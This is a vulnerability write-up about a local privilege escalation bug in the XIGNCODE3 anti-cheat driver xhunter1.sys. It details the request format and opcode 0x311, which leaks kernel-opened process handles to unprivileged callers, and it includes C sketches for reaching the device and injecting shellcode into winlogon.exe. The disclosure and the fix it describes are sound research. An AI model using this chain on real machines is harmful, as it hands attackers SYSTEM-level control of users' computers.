XIGNCODE3 xhunter1.sys LPE

From leaked kernel-mode process handle to SYSTEM

XIGNCODE3 is a popular anti-cheat solution provided on a B2B2C basis, predominantly found in online games. This class of software is known for its invasive nature: it effectively acts as a user-mode rootkit on the user’s system, adopting very aggressive scanning practices in order to detect known cheating tools.

In this instance, the anti-cheat in question also loads a signed driver into the user’s system, which it subsequently interacts with from user-mode in order to perform certain tasks. In this post, we will be exploring the communication mechanism in place, and demonstrate one of the vulnerabilities found in the driver itself.

Before we begin, it is worth noting that any process and any user on the system can interact with the driver in question. The driver is only unloaded from the system when there are zero open handles left to its device. Similarly, the driver allows multiple processes to interact with it at the same time, with no authentication mechanism in place to detect potential malicious use.

The main point of interest here is the DriverEntry function, which, as the name implies, is the entry point for any given Windows driver. The device name is known to match the name of the driver itself, so the first priority is to identify the device callback functions, as they are defined in the DriverObject.

Looking into the IoCreateDevice call within DriverEntry, we see the following:

In this context, the rdi register contains a pointer to the driver’s own DriverObject. Looking at the structure of _DRIVER_OBJECT, we can identify the following callback functions:

* DriverUnload (offset 0x68): sub_140004934
* MajorFunction[IRP_MJ_CREATE] (offset 0x70, IRP index 0): sub_1400045CC
* MajorFunction[IRP_MJ_CLOSE] (offset 0x80, IRP index 2): sub_14000457C
* MajorFunction[IRP_MJ_WRITE] (offset 0x90, IRP index 4): sub_140004600

Given this, we can deduce that communications with the driver are facilitated over file write operations rather than through IOCTLs.
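From user-mode, this means the driver is reached with nothing more exotic than CreateFile and WriteFile. The sketch below illustrates this (Win32-only, error handling trimmed); the \\.\xhunter1 device path is an assumption based on the device being named after the driver, and the packet contents are left blank here.

```c
/* Win32 sketch (illustrative, not portable): talking to the driver via
 * a plain file write. "\\.\xhunter1" is assumed from the driver name. */
#include <windows.h>
#include <stdio.h>

int main(void)
{
    BYTE packet[0x270] = { 0 }; /* request buffer; contents omitted here */
    DWORD written = 0;

    HANDLE dev = CreateFileA("\\\\.\\xhunter1", GENERIC_WRITE,
                             FILE_SHARE_READ | FILE_SHARE_WRITE, NULL,
                             OPEN_EXISTING, 0, NULL);
    if (dev == INVALID_HANDLE_VALUE) {
        fprintf(stderr, "CreateFileA failed: %lu\n", GetLastError());
        return 1;
    }

    /* The request header and opcode arguments would be filled in here. */
    WriteFile(dev, packet, sizeof packet, &written, NULL);
    CloseHandle(dev);
    return 0;
}
```

Note that, as mentioned earlier, no privileges beyond the ability to open the device are required, so this works from any user context.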

Switching over to the write handler, we see the following:

Reading over the given disassembly and what it does with the IRP passed to it, we find the following:

* The write operation is expected to be 0x270 bytes in length.
* The first DWORD of the packet contents must also be the constant 0x270 (presumed to be the size field of the header).
* The second DWORD of the packet must be the constant 0x345821AB (the header’s “magic” value for requests).

If these conditions are met, the opcode handler specified in the request is invoked with a pointer to the result buffer (a stack location in the IRP handler) and a pointer to the request content buffer. After the handler executes, the driver allocates an MDL describing a location in the invoking process’ virtual memory (as provided in the packet header), 0x2FA bytes in length, and copies the result from its stack to the user-mode location specified. It is worth noting that the contents of the stack location in question aren’t zeroed out at any point, resulting in the potential leaking of kernel-mode pointers.

For brevity, this post won’t further elaborate on how the packet structure was discovered, or on the dispatch process itself. The driver defines a hard-coded list of handlers and their respective opcodes in a structure, which the dispatch function iterates over. For this LPE exploit, we will be focusing on the handler for opcode 0x311 (785 in decimal), which is located at sub_140001920 in our sample.

In short, this handler takes the PID and access mask provided in the request structure, and returns the respective handle (if any) and the NTSTATUS produced by the function.

Delving into the function invoked by the opcode handler, we see the following:

It’s likely that the developer expected the handle produced here to be valid only within the context of the kernel (indeed, the KernelMode KPROCESSOR_MODE argument here is slightly misleading). This assumption is supported by the fact that there are multiple other handlers that expect a handle to be passed in for use with certain operations, such as ZwQueryInformationProcess, and copy their result back to user-mode. However, because the handle is created without the OBJ_KERNEL_HANDLE attribute, it ends up in the handle table of the process invoking the request to the driver. As per the MSDN documentation for ObOpenObjectByPointer, specifying OBJ_KERNEL_HANDLE in HandleAttributes would have sufficed to prevent this scenario.
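For reference, the corrected call would look roughly like the following WDK sketch (illustrative only, not compilable outside a kernel build environment; variable names are assumed):

```c
/* Kernel-mode sketch: with OBJ_KERNEL_HANDLE, the returned handle lives
 * only in the kernel handle table, so the requesting user-mode process
 * never receives a usable handle. */
HANDLE handle = NULL;
NTSTATUS status = ObOpenObjectByPointer(
    Process,            /* PEPROCESS looked up from the requested PID */
    OBJ_KERNEL_HANDLE,  /* the missing HandleAttributes flag */
    NULL,               /* PassedAccessState */
    DesiredAccess,      /* access mask taken from the request packet */
    *PsProcessType,
    KernelMode,
    &handle);
```

Without that flag, the driver effectively acts as a confused deputy, handing out OpenProcess-equivalent handles with arbitrary access to an unprivileged caller.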

The exploitation process after acquiring a handle is fairly straightforward. Since we can acquire a handle to any process on the system at this point, we can allocate memory in the remote process using VirtualAllocEx, copy our shellcode over to the newly-allocated region using WriteProcessMemory, and finally invoke CreateRemoteThread to execute our shellcode within its context.

One pitfall to watch out for is session 0 isolation, introduced in Windows Vista. This prevents us from launching a SYSTEM shell directly into our session from most SYSTEM processes, which run in session 0. Thankfully, we can get around this by locating the winlogon.exe instance belonging to our session (winlogon.exe runs as SYSTEM within each interactive session) and injecting our code into that instead.
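The two steps above can be sketched as follows (Win32-only, illustrative; error handling omitted and function names are our own):

```c
/* Win32 sketch: find our session's winlogon.exe, then perform classic
 * CreateRemoteThread injection using the handle leaked by the driver
 * (opcode 0x311) in place of OpenProcess. */
#include <windows.h>
#include <tlhelp32.h>

static DWORD find_session_winlogon(void)
{
    DWORD session = 0, pid = 0, target_session = 0;
    ProcessIdToSessionId(GetCurrentProcessId(), &target_session);

    HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    PROCESSENTRY32 pe = { .dwSize = sizeof pe };
    for (BOOL ok = Process32First(snap, &pe); ok; ok = Process32Next(snap, &pe)) {
        if (_stricmp(pe.szExeFile, "winlogon.exe") == 0 &&
            ProcessIdToSessionId(pe.th32ProcessID, &session) &&
            session == target_session) {
            pid = pe.th32ProcessID;
            break;
        }
    }
    CloseHandle(snap);
    return pid;
}

static void inject(HANDLE process, const void *shellcode, SIZE_T len)
{
    /* `process` is the leaked handle returned by the driver. */
    void *remote = VirtualAllocEx(process, NULL, len,
                                  MEM_COMMIT | MEM_RESERVE,
                                  PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(process, remote, shellcode, len, NULL);
    CreateRemoteThread(process, NULL, 0,
                       (LPTHREAD_START_ROUTINE)remote, NULL, 0, NULL);
}
```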

A proof-of-concept leveraging the findings above can be found here. This proof-of-concept has been tested on Windows 10 version 1803 x64, but should work on all x86 and x64 versions of Windows from Vista onward.

The sample of xhunter1.sys used for the research above has the following hashes: